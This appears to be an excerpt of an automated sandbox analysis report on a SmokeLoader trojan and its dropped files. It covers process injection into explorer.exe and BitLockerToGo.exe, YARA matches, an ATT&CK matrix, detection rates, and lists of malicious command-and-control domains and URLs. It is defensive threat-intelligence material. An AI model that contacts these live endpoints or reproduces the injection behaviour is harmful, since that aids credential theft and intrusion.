Source: 46F6.exe, 00000008.00000002.2923398094.000000C000CB6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: celebratioopz.shop

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\oRKal761Qm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\46F6.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: E20000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46F6.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3084008			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\46F6.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Jump to behavior

Source: explorer.exe, 00000001.00000000.1853960365.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1852883284.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1855756939.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1852883284.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1852670256.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1852883284.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1852883284.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Roaming\ssegbth

Code function: GetLocaleInfoA,

10_2_00409824

Source: C:\Users\user\AppData\Local\Temp\E9D3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\46F6.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\46F6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46F6.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46F6.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46F6.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\oRKal761Qm.exe

0_2_00423920

Source: C:\Users\user\Desktop\oRKal761Qm.exe

0_2_00423920

Source: C:\Users\user\AppData\Local\Temp\E9D3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Go Injector

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 8.2.46F6.exe.7ff7cd510000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.46F6.exe.7ff7cd510000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2941945429.00007FF7CE067000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.2678731371.00007FF7CE067000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 46F6.exe PID: 4412, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\46F6.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1869071575.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2175430377.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1868969005.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2175219428.00000000006A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Go Injector

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 8.2.46F6.exe.7ff7cd510000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.46F6.exe.7ff7cd510000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2941945429.00007FF7CE067000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.2678731371.00007FF7CE067000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 46F6.exe PID: 4412, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\46F6.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1869071575.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2175430377.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1868969005.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2175219428.00000000006A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	Boot or Logon Initialization Scripts	612 Process Injection	3 Obfuscated Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	134 System Information Discovery	SMB/Windows Admin Shares	2 Clipboard Data	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	421 Security Software Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	2 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	3 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	612 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
oRKal761Qm.exe	82%	ReversingLabs	Win32.Trojan.Smokeloader
oRKal761Qm.exe	100%	Avira	HEUR/AGEN.1318094
oRKal761Qm.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\ssegbth	100%	Avira	HEUR/AGEN.1318094
C:\Users\user\AppData\Roaming\ssegbth	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\46F6.exe	32%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\E9D3.exe	79%	ReversingLabs	Win64.Trojan.Smokeloader
C:\Users\user\AppData\Roaming\ssegbth	82%	ReversingLabs	Win32.Trojan.Smokeloader

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://aka.ms/odirmr	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://wns.windows.com/L	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://word.office.com	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
http://schemas.micr	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	URL Reputation	safe
https://www.rd.com/list/polite-habits-campers-dislike/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://outlook.com_	0%	URL Reputation	safe
https://github.com/zloirock/core-js	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D	100%	Avira URL Cloud	malware
https://languagedscie.shop/api	100%	Avira URL Cloud	malware
http://olinsw.ws/tmp/index.php	100%	Avira URL Cloud	malware
http://100xmargin.com/tmp/index.php	100%	Avira URL Cloud	malware
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://deallerospfosu.shop/C	100%	Avira URL Cloud	phishing
http://schemas.mi	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=5iTMW1V3HmVR&a	0%	URL Reputation	safe
https://celebratioopz.shop/api	100%	Avira URL Cloud	malware
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://quialitsuzoxm.shop/api	100%	Avira URL Cloud	phishing
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
http://mzxn.ru/tmp/index.php	100%	Avira URL Cloud	malware
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	0%	Avira URL Cloud	safe
https://mussangroup.com/wp-content/images/pic5.jpg	100%	Avira URL Cloud	malware
https://writerospzm.shop//	0%	Avira URL Cloud	safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a	0%	Avira URL Cloud	safe
https://mennyudosirso.shop/api	100%	Avira URL Cloud	malware
https://petstore.swagger.io/v2/swagger.json	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=R0Sr	0%	Avira URL Cloud	safe
https://deallerospfosu.shop:443/api	100%	Avira URL Cloud	phishing
https://tenntysjuxmz.shop/G	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	0%	Avira URL Cloud	safe
https://tenntysjuxmz.shop/I	0%	Avira URL Cloud	safe
https://tenntysjuxmz.shop:443/apifiles/76561199724331900	0%	Avira URL Cloud	safe
https://deallerospfosu.shop/W	100%	Avira URL Cloud	phishing
https://complaintsipzzx.shop/	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	0%	Avira URL Cloud	safe
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	Avira URL Cloud	safe
https://tenntysjuxmz.shop/apip	0%	Avira URL Cloud	safe
https://tenntysjuxmz.shop/	0%	Avira URL Cloud	safe
https://writerospzm.shop/api	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	0%	Avira URL Cloud	safe
https://steamcommunity.com/my/wishlist/	0%	Avira URL Cloud	safe
https://bassizcellskz.shop/api	100%	Avira URL Cloud	phishing
http://wgdnb4rc.xyz/tmp/index.php	0%	Avira URL Cloud	safe
https://complaintsipzzx.shop/api	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	0%	Avira URL Cloud	safe
https://steamcommunity.com/market/	0%	Avira URL Cloud	safe
https://mennyudosirso.shop/	100%	Avira URL Cloud	malware
https://mundoparachicas.space:443/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12	100%	Avira URL Cloud	malware
https://languagedscie.shop/apip	100%	Avira URL Cloud	malware
https://deallerospfosu.shop/	100%	Avira URL Cloud	phishing
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	0%	Avira URL Cloud	safe
https://steamcommunity.com/discussions/	0%	Avira URL Cloud	safe
https://languagedscie.shop/	100%	Avira URL Cloud	malware
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
writerospzm.shop	172.67.166.231	true	true	unknown
deallerospfosu.shop	172.67.204.20	true	true	unknown
languagedscie.shop	188.114.97.3	true	true	unknown
steamcommunity.com	23.197.127.21	true	false	unknown
complaintsipzzx.shop	104.21.14.101	true	true	unknown
bassizcellskz.shop	188.114.96.3	true	true	unknown
mzxn.ru	77.29.6.193	true	true	unknown
tenntysjuxmz.shop	188.114.97.3	true	true	unknown
100xmargin.com	189.163.89.217	true	true	unknown
mundoparachicas.space	188.114.97.3	true	true	unknown
mussangroup.com	185.149.100.242	true	true	unknown
quialitsuzoxm.shop	188.114.96.3	true	true	unknown
celebratioopz.shop	unknown	unknown	true	unknown
mennyudosirso.shop	unknown	unknown	true	unknown
oytrtojfgh.asia	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://100xmargin.com/tmp/index.php	true	Avira URL Cloud: malware	unknown
https://quialitsuzoxm.shop/api	true	Avira URL Cloud: phishing	unknown
http://olinsw.ws/tmp/index.php	true	Avira URL Cloud: malware	unknown
https://mundoparachicas.space/imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D	true	Avira URL Cloud: malware	unknown
http://mzxn.ru/tmp/index.php	true	Avira URL Cloud: malware	unknown
https://languagedscie.shop/api	true	Avira URL Cloud: malware	unknown
https://mussangroup.com/wp-content/images/pic5.jpg	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://writerospzm.shop/api	true	Avira URL Cloud: malware	unknown
https://bassizcellskz.shop/api	true	Avira URL Cloud: phishing	unknown
https://complaintsipzzx.shop/api	true	Avira URL Cloud: malware	unknown
http://wgdnb4rc.xyz/tmp/index.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://deallerospfosu.shop/C	BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://steamcommunity.com/?subsection=broadcasts	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/zloirock/core-js	46F6.exe.1.dr	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1855756939.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/subscriber_agreement/	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1857879944.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://celebratioopz.shop/api	BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.valvesoftware.com/legal.htm	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://writerospzm.shop//	BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1854160723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1857879944.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://mennyudosirso.shop/api	BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en	BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://deallerospfosu.shop:443/api	BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
